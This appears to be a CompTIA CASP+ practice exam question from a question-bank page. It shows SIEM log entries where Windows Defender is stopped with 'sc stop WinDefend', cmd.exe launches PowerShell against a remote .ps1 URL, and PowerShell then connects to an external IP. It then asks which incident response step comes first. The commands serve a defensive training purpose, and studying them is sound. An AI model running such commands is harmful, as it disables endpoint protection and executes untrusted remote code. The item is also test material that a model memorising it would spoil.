A security analyst notices a number of SIEM events that show the following activity:Which of the following response actions should the analyst take FIRST?

Question 38 of 44 from exam CAS-004: CompTIA CASP+

Prev Question Next Question

Question

A security analyst notices a number of SIEM events that show the following activity:

$10/30/2020 - 8:01 UTC - 192.168.1.1 - sc stop WinDefend 10/30/2020 - 8:05 UTC - 192.168.1.2 - c:\program files\ganes\conptiacasp.exe 10/30/2020 - 8:07 UTC - 192.168.1.1 - c:\windows\system32\cmd.exe /c powershell https://content.comptia.com/content.exam.ps1 10/30/2020 - 8:07 UTC ~ 192.168.1.1 - powershell --> 40.90.23.154:443$

Which of the following response actions should the analyst take FIRST?

Answers

A. Disable powershell.exe on all Microsoft Windows endpoints.

B. Restart Microsoft Windows Defender.

C. Configure the forward proxy to block 40.90.23.154.

D. Disable local administrator privileges on the endpoints.

Show Answer

Explanations

Click on the arrows to vote for the correct answer

A. B. C. D.

Prev Question Next Question